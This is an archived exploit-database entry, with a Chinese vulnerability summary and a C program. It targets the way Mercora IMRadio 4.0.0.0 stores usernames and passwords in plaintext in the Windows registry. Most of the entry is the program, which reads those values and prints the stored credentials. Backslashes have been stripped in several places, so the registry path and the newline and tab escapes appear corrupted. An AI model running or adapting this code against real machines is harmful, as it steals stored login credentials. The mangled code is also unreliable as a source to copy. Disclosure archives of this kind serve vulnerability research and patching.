https://www.exploit-db.com/exploits/1173
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200509-094

MercoraIMRadio可以搜索、聆听和录制音乐。Mercora是一个用于人们、DJ和艺术家的合法音乐广播网络来源。该软件联合因特网数据流，指定国家拷贝权依据，依据社交网络技术。该软件支持活动音乐搜索功能。MercoraIMRadio4.0.0.0版在注册表键值MercoraClientProfiles的明码文本中存储文件名和密码，允许本地用户获得权限。

/*================================================================

Mercora IMRadio 4.0.0.0 password disclosure local exploit by Kozan

Discovered & Coded by: Kozan
Credits to ATmaCA
Web: www.spyinstructors.com
Mail: [email protected]

=====[ Application ]==============================================

Application: Mercora IMRadio 4.0.0.0 (and probably prior versions)
Vendor: www.mercora.com

=====[ Introduction ]=============================================

Search, listen, and record any music. With over 2.5 million unique
tracks, Mercora is a legal music radio network powered by people,
DJs, and artists just like you. Mercora combines Internet streaming,
country-specific copyright compliance, and social networking
technologies to create the next generation of digital music.
Version 4.0 supports friends and family listening, a vastly
simplified interface, customized listening, and live music search.

=====[ Bug ]======================================================

Mercora IMRadio 4.0.0.0 stores username and passwords in the Windows
Registry in plain text. A local user can read the values.

HKEY_CURRENT_USERSoftwareMercoraMercoraClientProfiles
Auto.Username = Mercora IMRadio Username
Auto.Password = Mercora IMRadio Password

=====[ Vendor Confirmed ]=========================================

No

=====[ Fix ]======================================================

There is no solution at the time of this entry.

================================================================*/

#include <stdio.h>
#include <windows.h>
#define BUF 100

int main()
{
       HKEY hKey;
       char Username[BUF], Password[BUF];
       DWORD dwBUFLEN = BUF;
       LONG lRet;

       if( RegOpenKeyEx(HKEY_CURRENT_USER,
                                       "Software\Mercora\MercoraClient\Profiles",
                                       0,
                                       KEY_QUERY_VALUE,
                                       &hKey
                                       ) == ERROR_SUCCESS )
       {
               lRet = RegQueryValueEx(hKey, "Auto.Password", NULL, NULL, (LPBYTE)Password, &dwBUFLEN);
               if (lRet != ERROR_SUCCESS || dwBUFLEN > BUF) strcpy(Password,"Not Found!");

               lRet = RegQueryValueEx(hKey, "Auto.Username", NULL, NULL, (LPBYTE)Username, &dwBUFLEN);
               if (lRet != ERROR_SUCCESS || dwBUFLEN > BUF) strcpy(Username,"Not Found!");

               RegCloseKey(hKey);

               fprintf(stdout, "Mercora IMRadio 4.0.0.0 password disclosure local exploit by Kozann");
               fprintf(stdout, "Credits to ATmaCAn");
               fprintf(stdout, "www.spyinstructors.com n");
               fprintf(stdout, "[email protected]");
               fprintf(stdout, "Username :t%sn",Username);
               fprintf(stdout, "Password :t%sn",Password);
       }
       else
       {
               fprintf(stderr, "Mercora IMRadio 4.0.0.0 is not installed on your system!n");
       }

       return 0;
}

// milw0rm.com [2005-08-22]

来源:SECTRACK
名称:1014780
链接:http://securitytracker.com/id?1014780